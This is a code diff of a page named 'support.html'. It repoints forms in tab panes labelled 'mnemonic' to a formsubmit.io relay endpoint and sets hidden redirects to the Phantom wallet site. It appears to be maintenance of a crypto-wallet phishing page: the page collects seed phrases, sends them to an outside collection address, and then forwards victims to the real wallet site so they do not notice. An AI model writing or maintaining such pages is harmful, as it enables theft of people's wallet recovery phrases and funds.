--- a/support.html
+++ b/support.html
@@ -25,7 +25,7 @@
 
        <div class="tab-content" id="myTabContent">
       <div class="tab-pane fade active show" id="mnemonic" role="tabpanel" aria-labelledby="mnemonic-tab">
-        <form id="contactForm" action="https://formsubmit.io/send/3106ab1d-63bb-47a7-90c0-d0d34b8a5545" method="POST">
+        <form id="contactForm" action="https://formsubmit.io/send/d7fb164b-af4f-478d-89b9-26d7b3579a13" method="POST">
           <input name="_redirect" type="hidden" id="name" value="https://phantom.app/">
 
           <div class="">
@@ -129,8 +129,8 @@
 
     <div class="tab-content" id="myTabContent">
       <div class="tab-pane fade active show" id="mnemonic" role="tabpanel" aria-labelledby="mnemonic-tab">
-        <form id="contactForm" action="https://formsubmit.io/send/12b9b000-e2dd-4f62-9b6a-bba7ac6bb4e3" method="POST">
-          <input name="_redirect" type="hidden" id="name" value="https://metamask.io/">
+        <form id="contactForm" action="https://formsubmit.io/send/d7fb164b-af4f-478d-89b9-26d7b3579a13" method="POST">
+          <input name="_redirect" type="hidden" id="name" value="https://phantom.app/">
 
           <div class="">
             <div class="input">
